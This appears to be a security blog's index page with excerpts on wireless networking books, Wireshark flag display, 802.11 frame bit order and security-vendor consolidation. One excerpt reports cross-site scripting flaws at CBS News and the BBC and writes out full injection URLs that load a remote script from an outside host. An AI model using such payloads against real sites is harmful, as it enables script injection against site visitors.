Posts

Review of 802.11 Wireless Networks Posted

Image
Amazon.com just posted my five star review of 802.11 Wireless Networks: The Definitive Guide, 2nd Ed by Matthew Gast . Wow, what an excellent book. From the review : I tend not to read and review books on as broad a subject as "wireless networking." I've read and reviewed wireless security books like Real 802.11 Security and Wi-Foo, but 802.11 Wireless Networks: The Definitive Guide, 2nd Ed (8WN2E) was a departure for me. Thankfully, 8WN2E is an incredible book. It exceeded my expectations and definitely earned its "Definitive Guide" status. In addition to the book, I recommend Matthew's blog posts Top Ten 802.11 Myths of 2005 and When Is 54 Not Equal to 54? A Look at 802.11a, b, and g Throughput . One of the marks of a great book is authoritatively answering a question I've pondered for a while. For example, I've heard that the introduction of 802.11b stations into an 802.11g network means all stations run at 802.11b speeds. This is absolute...

Why 0wn When You Can XSS

The creative Russians at Security Lab posted word of two more high-profile sites with Cross Site Scripting (XSS) vulnerabilities. They used this announcement to demonstrate problems at CBS News and the BBC. The URL they provide for CBS is: http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1 \ --%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!-- (Remove the space and \ to make the URL one big line.) Looks like there's a problem with the zipcode part of the site through which one can check local weather. The URL for the BBC is similar: http://www.bbc.co.uk/bbcone/listings/index.shtml?service_id=4223&DAY=today %22%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!-- (Remove the space and \ to make the URL one big line.) The file sc.js that they retrieve has the following: document.write('<p align=left>Mon, 28 August 2006'); document.write('<p align=center><b>George B...

A Real Wireshark Quirk

Ok, what is the deal with this? (By the way, I don't care if this sounds like mindless rambling. It's late on a Saturday night and I'm analyzing traffic. W00t.) Here are TCP flags from a random segment. Flags: 0x0018 (PSH, ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 1... = Push: Set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...0 = Fin: Not set TCP flags occupy 1 byte, and that's it. Why does Wireshark/etc. say Flags: 0x0018 (PSH, ACK) Why not Flags: 0x18 (PSH, ACK) that instead?

Deciphering 802.11

Image
I'm reading the excellent 802.11 Wireless Networks: The Definitive Guide, 2nd Ed by Matthew Gast . Matthew knows 802.11, period. I can't wait to review this book. I wish I had read it sooner. I've been analyzing network traffic in Wireshark while devouring the book. I read that figures like 3-10 (reproduced below -- please consider this free publicity, O'Reilly!) show the least significant bit (LSb) first -- at least within a defined field. Also, although the diagrams are LSb first, the text uses values that are most siginifcant bit (MSb) first. For example, the subtype for a RTS frame is depicted as 1101 in a diagram but 1011 in the text and Table 3-1. This is where I became confused when closely inspecting Wireshark output. The top of the figure shows a generic 802.11 MAC frame. The bottom of the figure expands upon the Frame Control field. With the FC field, notice the bits are numbered 0 to 15, with 0 at the far left and 15 at the far right of the diagram. ...

Review of How to Cheat at Securing a Wireless Network Posted

Image
Amazon.com just posted my three star review of How to Cheat at Securing a Wireless Network . From the review : How to Cheat at Securing a Wireless Network (HTCASAWN) seemed to have a lot of promise. A quick initial look showed discussions of wireless VLANs, WPA, and command syntax for Cisco gear. I thought this would be a good book to read and review, since I try to avoid reading and reviewing books I won't find useful. About halfway through HTCASAWN I made a sad discovery: 7 of 12 chapters are duplicates of chapters from books published in 2001 and 2002, and an eighth chapter largely duplicates a book from 2004. What would probably have been a 4 star review immediately became a tenuous 3 star review, thanks to apparently verbatum reprinting of old material. This book should probably be called How to Cheat at Writing a Book About Securing a Wireless Network . :(

Review of Winternals Posted

Image
Amazon.com just posted my four star review of Winternals . From the review : I starting looking at Winternals shortly after Microsoft acquired the Winternals company. I almost didn't read the book, because I do not use the commercial Winternals tools. When I saw the book covered tools available from Sysinternals, I decided to concentrate on information relevant to me. I'm glad I did -- Winternals is a remarkably helpful book.

All Network Security Functions in the Switch

The ISS acquisition has me thinking again about the security space. I noticed Richard Stiennon wrote the following: Consolidation? Not even close. There are over 867 vendors in the IT-Harvest knowledge base this morning. When that number falls month to month we can start talking about consolidation. I'm not sure that's the right way to look at the issue. How many of those companies are 1 year old or less? 2 years? 3 years? I'm guessing that many companies that were firewall development startups have either been bought or gone out of business. The same can be said for other product types. The vendor count may never decrease because new companies are always joining the market to address new problems (or so they claim). I think that process is consolidation. The main reason I posted this entry, however, is the title above. I am not the only person to discuss collapsing all network security functions into switches, and I have probably said something similar already...